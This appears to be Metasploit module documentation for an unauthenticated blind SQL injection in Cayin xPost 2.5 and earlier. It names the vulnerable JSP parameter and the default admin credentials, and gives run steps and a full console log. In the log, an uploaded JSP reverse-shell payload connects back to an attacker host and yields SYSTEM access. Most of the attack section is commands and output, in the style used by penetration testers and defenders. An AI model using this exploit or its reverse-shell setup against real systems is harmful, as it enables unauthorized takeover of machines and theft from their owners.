## Vulnerable Application

This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. 
The `wayfinder_meeting_input.jsp` file's `wayfinder_seqid` parameter can 
be injected with a blind SQLi. Since this app bundles MySQL and Apache 
Tomcat the environment is pretty static and therefore the default 
settings should work. Results in SYSTEM level access. Only the 
`java/jsp_shell_reverse_tcp` and `java/jsp_shell_bind_tcp` payloads seem 
to be valid.

Default authentication for the system is administrator:admin from
[Guide](http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf) page 16

## Verification Steps

  1. Install the application and start it
  2. Start msfconsole
  3. Do: ```exploit/windows/http/cayin_xpost_sql_rce```
  4. Do: ```set rhosts [ip]```
  5. Do: ```run```
  6. You should get a shell.

## Options

### LOCALWEBROOT

Path to the `webapps` folder for Cayin.  Defaults to `C:/CayinApps/webapps/`

## Scenarios

### Cayin xPost 2.5 on Windows 10.0.16299.125

  ```
  [*] Processing xpost.rb for ERB directives.
  resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
  resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
  payload => java/jsp_shell_reverse_tcp
  resource (xpost.rb)> set rhosts 2.2.2.2
  rhosts => 2.2.2.2
  resource (xpost.rb)> set lhost 1.1.1.1
  lhost => 1.1.1.1
  resource (xpost.rb)> set verbose true
  verbose => true
  resource (xpost.rb)> exploit
  [*] Started reverse TCP handler on 1.1.1.1:4444 
  [*] Utilizing payload filename cY0bWf1Rh6C9.jsp
  [*] Payload Size: 1499
  [*] Payload Size Encoded: 2998
  [*] Attempting Exploitation
  [*] Triggering uploaded payload
  [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
  [!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result
  
  
  C:\CayinApps\Tomcat>
  C:\CayinApps\Tomcat>whoami
  whoami
  nt authority\system
  
  C:\CayinApps\Tomcat>ver
  ver
  
  Microsoft Windows [Version 10.0.16299.125]
  
  C:\CayinApps\Tomcat>
  ```